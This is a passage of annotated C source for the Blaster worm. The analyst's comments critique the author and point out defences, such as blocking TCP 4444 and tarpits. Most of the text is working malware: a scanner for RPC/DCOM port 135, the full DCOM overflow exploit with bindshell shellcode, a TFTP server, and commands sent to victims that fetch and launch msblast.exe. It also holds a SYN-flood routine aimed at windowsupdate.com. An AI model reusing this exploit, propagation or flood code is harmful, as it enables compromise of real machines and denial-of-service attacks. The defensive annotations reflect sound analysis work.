blaster_spreader();

/*

* It'll never reach this point, but in theory, you need a

* WSACleanup() after a WSAStartup().

*/

WSACleanup();

}

/*

* This will be called from CreateThread in the main worm body

* right after it connects to port 4444. After the thread is

* started, it then sends the string "

* tftp -i %d.%d.%d.%d GET msblast.exe" (where the %ds represents

* the IP address of the attacker).

* Once it sends the string, it then waits for 20 seconds for the

* TFTP server to end. If the TFTP server doesn't end, it calls

* TerminateThread.

*/

DWORD WINAPI blaster_tftp_thread(LPVOID p)

{

/*

* This is the protocol format of a TFTP packet. This isn't

* used in the code -- I just provide it here for reference

*/

struct TFTP_Packet

{

short opcode;

short block_id;

char data[512];

};

char reqbuf[512]; /* request packet buffer */

struct sockaddr_in server; /* server-side port number */

struct sockaddr_in client; /* client IP address and port */

int sizeof_client; /* size of the client structure*/

char rspbuf[512]; /* response packet */

static int fd; /* the socket for the server*/

register FILE *fp;

register block_id;

register int block_size;

/* Set a flag indicating this thread is running. The other

* thread will check this for 20 seconds to see if the TFTP

* service is still alive. If this thread is still alive in

* 20 seconds, it will be killed.

*/

is_tftp_running = TRUE; /*1 == TRUE*/

/* Create a server-socket to listen for UDP requests on */

fd = socket(AF_INET, SOCK_DGRAM, 0);

if (fd == SOCKET_ERROR)

goto closesocket_and_exit;

/* Bind the socket to 69/udp */

memset(&server, 0, sizeof(server));

server.sin_family = AF_INET;

server.sin_port = htons(TFTP_PORT_69);

server.sin_addr.s_addr = 0; /*TFTP server addr = */

if (bind(fd, (struct sockaddr*)&server, sizeof(server)) != 0)

goto closesocket_and_exit;

/* Receive a packet, any packet. The contents of the received

* packet are ignored. This means, BTW, that a defensive

* "worm-kill" could send a packet from somewhere else. This

* will cause the TFTP server to download the msblast.exe

* file to the wrong location, preventing the victim from

* doing the download. */

sizeof_client = sizeof(client);

if (recvfrom(fd, reqbuf, sizeof(reqbuf), 0,

(struct sockaddr*)&client, &sizeof_client) <= 0)

goto closesocket_and_exit;

/* The TFTP server will respond with many 512 byte blocks

* until it has completely sent the file; each block must

* have a unique ID, and each block must be acknowledged.

* BUFORD: The worm ignores TFTP ACKs. This is probably why

* the worm restarts the TFTP service rather than leaving it

* enabled: it essentially flushes all the ACKs from the

* the incoming packet queue. If the ACKs aren't flushed,

* the worm will incorrectly treat them as TFTP requests.

*/

block_id = 0;

/* Open this file. GetModuleFilename was used to figure out

* this filename. */

fp = fopen(msblast_filename, "rb");

if (fp == NULL)

goto closesocket_and_exit;

/* Continue sending file fragments until none are left */

for (;;) {

block_id++;

/* Build TFTP header */

#define TFTP_OPCODE_DATA 3

*(short*)(rspbuf+0) = htons(TFTP_OPCODE_DATA);

*(short*)(rspbuf+2)= htons((short)block_id);

/* Read next block of data (about 12 blocks total need

* to be read) */

block_size = fread(rspbuf+4, 1, 512, fp);

/* Increase the effective length to include the TFTP

* head built above */

block_size += 4;

/* Send this block */

if (sendto(fd, (char*)&rspbuf, block_size,

0, (struct sockaddr*)&client, sizeof_client) <= 0)

break;

/* Sleep for a bit.

* The reason for this is because the worm doesn't care

* about retransmits -- it therefore must send these

* packets slow enough so congestion doesn't drop them.

* If it misses a packet, then it will DoS the victim

* without actually infecting it. Worse: the intended

* victim will continue to send packets, preventing the

* worm from infecting new systems because the

* requests will misdirect TFTP. This design is very

* bad, and is my bet as the biggest single factor

* that slows down the worm. */

Sleep(900);

/* File transfer ends when the last block is read, which

* will likely be smaller than a full-sized block*/

if (block_size != sizeof(rspbuf)) {

fclose(fp);

fp = NULL;

break;

}

}

if (fp != NULL)

fclose(fp);

closesocket_and_exit:

/* Notify that the thread has stopped, so that the waiting

* thread can continue on */

is_tftp_running = FALSE;

closesocket(fd);

ExitThread(0);

return 0;

}

/*

* This function increments the IP address.

* BUFORD: This conversion from numbers, to strings, then back

* to number is overly complicated. Experienced programmers

* would simply store the number and increment it. This shows

* that Buford does not have much experience work with

* IP addresses.

*/

void blaster_increment_ip_address()

{

for (;;) {

if (ClassD <= 254) {

ClassD++;

return;

}

ClassD = 0;

ClassC++;

if (ClassC <= 254)

return;

ClassC = 0;

ClassB++;

if (ClassB <= 254)

return;

ClassB = 0;

ClassA++;

if (ClassA <= 254)

continue;

ClassA = 0;

return;

}

}

/*

* This is called from the main() function in an

* infinite loop. It scans the next 20 addresses,

* then exits.

*/

void blaster_spreader()

{

fd_set writefds;

register int i;

struct sockaddr_in sin;

struct sockaddr_in peer;

int sizeof_peer;

int sockarray[20];

int opt = 1;

const char *victim_ip;

/* Create the beginnings of a "socket-address" structure that

* will be used repeatedly below on the 'connect()' call for

* each socket. This structure specified port 135, which is

* the port used for RPC/DCOM. */

memset(&sin, 0, sizeof(sin));

sin.sin_family = AF_INET;

sin.sin_port = htons(MSRCP_PORT_135);

/* Create an array of 20 socket descriptors */

for (i=0; i<20; i++) {

sockarray[i] = socket(AF_INET, SOCK_STREAM, 0);

if (sockarray[i] == -1)

return;

ioctlsocket(sockarray[i], FIONBIO , &opt);

}

/* Initiate a "non-blocking" connection on all 20 sockets

* that were created above.

* FAQ: Essentially, this means that the worm has 20

* "threads" -- even though they aren't true threads.

*/

for (i=0; i<20; i++) {

int ip;

blaster_increment_ip_address();

sprintf(target_ip_string, "%i.%i.%i.%i",

ClassA, ClassB, ClassC, ClassD);

ip = inet_addr(target_ip_string);

if (ip == -1)

return;

sin.sin_addr.s_addr = ip;

connect(sockarray[i],(struct sockaddr*)&sin,sizeof(sin));

}

/* Wait 1.8-seconds for a connection.

* BUG: this is often not enough, especially when a packet

* is lost due to congestion. A small timeout actually makes

* the worm slower than faster */

Sleep(1800);

/* Now test to see which of those 20 connections succeeded.

* BUFORD: a more experienced programmer would have done

* a single 'select()' across all sockets rather than

* repeated calls for each socket. */

for (i=0; i<20; i++) {

struct timeval timeout;

int nfds;

timeout.tv_sec = 0;

timeout.tv_usec = 0;

nfds = 0;

FD_ZERO(&writefds);

FD_SET((unsigned)sockarray[i], &writefds);

if (select(0, NULL, &writefds, NULL, &timeout) != 1) {

closesocket(sockarray[i]);

} else {

sizeof_peer = sizeof(peer);

getpeername(sockarray[i],

(struct sockaddr*)&peer, &sizeof_peer);

victim_ip = inet_ntoa(peer.sin_addr);

/* If connection succeeds, exploit the victim */

blaster_exploit_target(sockarray[i], victim_ip);

closesocket(sockarray[i]);

}

}

}

/*

* This is where the victim is actually exploited. It is the same

* exploit as created by xfocus and altered by HDMoore.

* There are a couple of differences. The first is that the in

* those older exploits, this function itself would create the

* socket and connect, whereas in Blaster, the socket is already

* connected to the victim via the scanning function above. The

* second difference is that the packets/shellcode blocks are

* declared as stack variables rather than as static globals.

* Finally, whereas the older exploits give the hacker a

* "shell prompt", this one automates usage of the shell-prompt

* to tell the victim to TFTP the worm down and run it.

*/

void blaster_exploit_target(int sock, const char *victim_ip)

{

/* These blocks of data are just the same ones copied from the

* xfocus exploit prototype. Whereas the original exploit

* declared these as "static" variables, Blaster declares

* these as "stack" variables. This is because the xfocus

* exploit altered them -- they must be reset back to their

* original values every time. */

unsigned char bindstr[]={

0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,

0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,

0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,

0x00,0x00,0x00,0x00,

0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,

0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request1[]={

0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03

,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00

,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45

,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E

,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D

,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41

,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00

,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45

,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00

,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00

,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03

,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00

,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29

,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00

,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00

,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10

,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF

,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10

,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09

,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00

,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00

,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00

,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00

,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01

,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03

,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00

,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E

,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00

,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00

,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00

,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00

,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00};

unsigned char request2[]={

0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00

,0x00,0x00,0x5C,0x00,0x5C,0x00};

unsigned char request3[]={

0x5C,0x00

,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00

,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00

,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00

,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};

unsigned char sc[]=

"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"

"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"

"\x46\x00\x58\x00\x46\x00\x58\x00"

"\xff\xff\xff\xff" /* return address */

"\xcc\xe0\xfd\x7f" /* primary thread data block */

"\xcc\xe0\xfd\x7f" /* primary thread data block */

/* port 4444 bindshell */

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"

"\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"

"\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"

"\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"

"\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"

"\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"

"\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"

"\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81"

"\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"

"\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"

"\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"

"\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"

"\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"

"\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"

"\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"

"\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"

"\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"

"\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"

"\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"

"\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"

"\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"

"\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"

"\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"

"\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"

"\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"

"\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"

"\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"

"\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"

"\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"

"\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"

"\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"

"\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";

unsigned char request4[]={

0x01,0x10

,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00

,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C

,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00

};

int ThreadId;

int len;

int sizeof_sa;

int ret;

int opt;

void *hThread;

struct sockaddr_in target_ip;

struct sockaddr_in sa;

int fd;

char cmdstr[0x200];

int len1;

unsigned char buf2[0x1000];

int i;

/*

* Turn off non-blocking (i.e. re-enable blocking mode)

* DEFENSE: Tarpit programs (e.g. 'labrea' or 'deredoc')

* will slow down the spread of this worm. It takes a long

* time for blocking calls to timeout. I had several

* thousand worms halted by my 'deredoc' tarpit.

*/

opt = 0;

ioctlsocket(sock, FIONBIO , &opt);

/*

* Choose whether the exploit targets Win2k or WinXP.

*/

if (winxp1_or_win2k2 == 1)

ret = 0x100139d;

else

ret = 0x18759f;

memcpy(sc+36, (unsigned char *) &ret, 4);

/* ----------------------------------------------

* This section is just copied from the original exploit

* script. This is the same as the scripts that have been

* widely published on the Internet. */

len=sizeof(sc);

memcpy(buf2,request1,sizeof(request1));

len1=sizeof(request1);

*(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;

*(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2;

memcpy(buf2+len1,request2,sizeof(request2));

len1=len1+sizeof(request2);

memcpy(buf2+len1,sc,sizeof(sc));

len1=len1+sizeof(sc);

memcpy(buf2+len1,request3,sizeof(request3));

len1=len1+sizeof(request3);

memcpy(buf2+len1,request4,sizeof(request4));

len1=len1+sizeof(request4);

*(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;

*(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;

*(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;

*(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;

*(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;

*(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;

*(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;

*(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc;

if (send(sock,bindstr,sizeof(bindstr),0)== -1)

{

//perror("- Send");

return;

}

if (send(sock,buf2,len1,0)== -1)

{

//perror("- Send");

return;

}

closesocket(sock);

Sleep(400);

/* ----------------------------------------------*/

/*

* This section of code connects to the victim on port 4444.

* DEFENSE : This means you can block this worm by blocking

* TCP port 4444.

* FAQ: This port is only open for the brief instant needed

* to exploit the victim. Therefore, you can't scan for

* port 4444 in order to find Blaster victims.

*/

if ((fd=socket(AF_INET,SOCK_STREAM,0)) == -1)

return;

memset(&target_ip, 0, sizeof(target_ip));

target_ip.sin_family = AF_INET;

target_ip.sin_port = htons(SHELL_PORT_4444);

target_ip.sin_addr.s_addr = inet_addr(victim_ip);

if (target_ip.sin_addr.s_addr == SOCKET_ERROR)

return;

if (connect(fd, (struct sockaddr*)&target_ip,

sizeof(target_ip)) == SOCKET_ERROR)

return;

/*

* This section recreates the IP address from whatever IP

* address this successfully connected to. In practice,

* the strings "victim_ip" and "target_ip_string" should be

* the same.

*/

memset(target_ip_string, 0, sizeof(target_ip_string));

sizeof_sa = sizeof(sa);

getsockname(fd, (struct sockaddr*)&sa, &sizeof_sa);

sprintf(target_ip_string, "%d.%d.%d.%d",

sa.sin_addr.s_net, sa.sin_addr.s_host,

sa.sin_addr.s_lh, sa.sin_addr.s_impno);

/*

* This section creates a temporary TFTP service that is

* ONLY alive during the period of time that the victim

* needs to download.

* FAQ: You can't scan for TFTP in order to find Blaster

* victims because the port is rarely open.

*/

if (fd_tftp_service)

closesocket(fd_tftp_service);

hThread = CreateThread(0,0,

blaster_tftp_thread,0,0,&ThreadId);

Sleep(80); /*give time for thread to start*/

/*

* This sends the command

* tftp -i 1.2.3.4 GET msblast.exe

* to the victim. The "tftp.exe" program is built into

* Windows. It's intended purpose is to allow users to

* manually update their home wireless access points with

* new software (and other similar tasks). However, it is

* not intended as a generic file-transfer protocol (it

* stands for "trivial-file-transfer-protocol" -- it is

* intended for only trivial tasks). Since a lot of hacker

* exploits use the "tftp.exe" program, a good hardening

* step is to remove/rename it.

*/

sprintf(cmdstr, "tftp -i %s GET %s\n",

target_ip_string, MSBLAST_EXE);

if (send(fd, cmdstr, strlen(cmdstr), 0) <= 0)

goto closesocket_and_return;

/*

* Wait 21 seconds for the victim to request the file, then

* for the file to be delivered via TFTP.

*/

Sleep(1000);

for (i=0; i<10 && is_tftp_running; i++)

Sleep(2000);

/*

* Assume the the transfer is successful, and send the

* command to start executing the newly downloaded program.

* BUFORD: The hacker starts this twice. Again, it

* demonstrates a lock of confidence, so he makes sure it's

* started by doing it twice in slightly different ways.

* Note that the "BILLY" mutex will prevent from actually

* running twice.

*/

sprintf(cmdstr, "start %s\n", MSBLAST_EXE);

if (send(fd, cmdstr, strlen(cmdstr), 0) <= 0)

goto closesocket_and_return;

Sleep(2000);

sprintf(cmdstr, "%s\n", MSBLAST_EXE);

send(fd, cmdstr, strlen(cmdstr), 0);

Sleep(2000);

/*

* This section closes the things started in this procedure

*/

closesocket_and_return:

/* Close the socket for the remote command-prompt that has

* been established to the victim. */

if (fd != 0)

closesocket(fd);

/* Close the TFTP server that was launched above. As noted,

* this means that the TFTP service is not running most of

* the time, so it's not easy to scan for infected systems.

*/

if (is_tftp_running) {

TerminateThread(hThread,0);

closesocket(fd_tftp_service);

is_tftp_running = 0;

}

CloseHandle(hThread);

}

/**

* Convert the name into an IP address. If the IP address

* is formatted in decimal-dot-notation (e.g. 192.2.0.43),

* then return that IP address, otherwise do a DNS lookup

* on the address. Note that in the case of the worm,

* it always gives the string "windowsupdate.com" to this

* function, and since Microsoft turned off that name,

* the DNS lookup will usually fail, so this function

* generally returns -1 (SOCKET_ERROR), which means the

* address 255.255.255.255.

*/

int blaster_resolve_ip(const char *windowsupdate_com)

{

int result;

result = inet_addr(windowsupdate_com);

if (result == SOCKET_ERROR) {

HOSTENT *p_hostent = gethostbyname(windowsupdate_com);

if (p_hostent == NULL)

result = SOCKET_ERROR;

else

result = *p_hostent->h_addr;

}

return result;

}

/*

* This thre

*/

ULONG WINAPI blaster_DoS_thread(LPVOID p)

{

int opt = 1;

int fd;

int target_ip;

/* Lookup the domain-name. Note that no checking is done

* to ensure that the name is valid. Since Microsoft turned

* this off in their domain-name servers, this function now

* returns -1. */

target_ip = blaster_resolve_ip("windowsupdate.com");

/* Create a socket that the worm will blast packets at

* Microsoft from. This is what is known as a "raw" socket.

* So-called "raw-sockets" are ones where packets are

* custom-built by the programmer rather than by the TCP/IP

* stack. Note that raw-sockets were not available in Windows

* until Win2k. A cybersecurity pundit called Microsoft

* "irresponsible" for adding them.

*

* That's probably an

* unfairly harsh judgement (such sockets are available in

* every other OS), but it's true that it puts the power of

* SYNflood attacks in the hands of lame worm writers. While

* the worm-writer would probably have chosen a different

* DoS, such as Slammer-style UDP floods, it's likely that

* Buford wouldn't have been able to create a SYNflood if

* raw-sockets had not been added to Win2k/WinXP. */

fd = WSASocket(

AF_INET, /*TCP/IP sockets*/

SOCK_RAW, /*Custom TCP/IP headers*/

IPPROTO_RAW,

NULL,

0,

WSA_FLAG_OVERLAPPED

);

if (fd == SOCKET_ERROR)

return 0;

/* Tell the raw-socket that IP headers will be created by the

* programmer rather than the stack. Most raw sockets in

* Windows will also have this option set. */

if (setsockopt(fd, IPPROTO_IP, IP_HDRINCL,

(char*)&opt, sizeof(opt)) == SOCKET_ERROR)

return 0;

/* Now do the SYN flood. The worm writer decided to flood

* slowly by putting a 20-millisecond delay between packets

* -- causing only 500 packets/second, or roughly, 200-kbps.

* There are a couple of reasons why the hacker may have

* chosen this.

* 1. SYNfloods are not intended to be bandwidth floods,

* even slow rates are hard to deal with.

* 2. Slammer DoSed both the sender and receiver, therefore

* senders hunted down infected systems and removed

* them. This won't DoS the sender, so people are more

* likely not to care about a few infected machines.

*/

for (;;) {

blaster_send_syn_packet(target_ip, fd);

/* Q: How fast does it send the SYNflood?

* A: About 50 packets/second, where each packet is

* 320-bits in size, for a total of 15-kbps.

* It means that Buford probably intended for

* dialup users to be a big source of the DoS

* attack. He was smart enough to realize that

* faster floods would lead to users discovering

* the worm and turning it off. */

Sleep(20);

}

closesocket(fd);

return 0;

}

/*

* This is a standard TCP/IP checksum algorithm

* that you find all over the web.

*/

int blaster_checksum(const void *bufv, int length)

{

const unsigned short *buf = (const unsigned short *)bufv;

